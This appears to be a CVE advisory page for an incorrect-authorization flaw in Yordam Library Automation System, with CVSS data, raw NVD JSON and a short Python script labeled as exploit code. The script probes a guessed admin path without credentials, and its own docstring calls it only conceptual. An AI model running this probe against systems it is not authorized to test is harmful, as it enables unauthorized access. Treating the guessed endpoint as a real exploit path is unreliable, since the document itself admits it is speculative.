Security Vulnerability Report
CVE-2025-15023 CVSS 8.8 HIGH

CVE-2025-15023

Published: 2026-05-14 18:16:35
Last Modified: 2026-05-14 18:19:37

Description

Incorrect Authorization vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Library Automation System: from v.19.5 before v.22.1.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Yordam Library Automation System from v19.5 before v22.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2025-15023 - Incorrect Authorization in Yordam Library Automation System

This script demonstrates checking for access control misconfiguration on a
target endpoint.

Note: This is a conceptual example based on the vulnerability description.
"""
import sys

import requests


def check_authorization_bypass(target_url):
    """
    Attempts to access a restricted endpoint without proper authentication.
    """
    # Example endpoint that might be vulnerable (e.g., admin panel or user data)
    restricted_path = "/admin/configure"
    full_url = f"{target_url}{restricted_path}"
    headers = {
        "User-Agent": (
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
        )
    }
    try:
        # Send request without authentication cookies/tokens
        response = requests.get(full_url, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Potential Vulnerability Detected! Endpoint accessible without auth: {full_url}")
            print(f"[+] Response Length: {len(response.text)}")
        elif response.status_code in [301, 302, 403, 401]:
            # A redirect to a login page or an explicit deny means the check is enforced
            print(f"[-] Access denied or redirect. Status code: {response.status_code}")
        else:
            print(f"[?] Unexpected status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <target_url>")
        print("Example: python3 poc.py http://target-library-system.com")
    else:
        check_authorization_bypass(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15023", "sourceIdentifier": "[email protected]", "published": "2026-05-14T18:16:34.527", "lastModified": "2026-05-14T18:19:37.060", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Authorization vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Exploiting Incorrectly Configured Access Control Security Levels.\n\nThis issue affects Library Automation System: from v.19.5 before v.22.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240", "source": "[email protected]"}]}}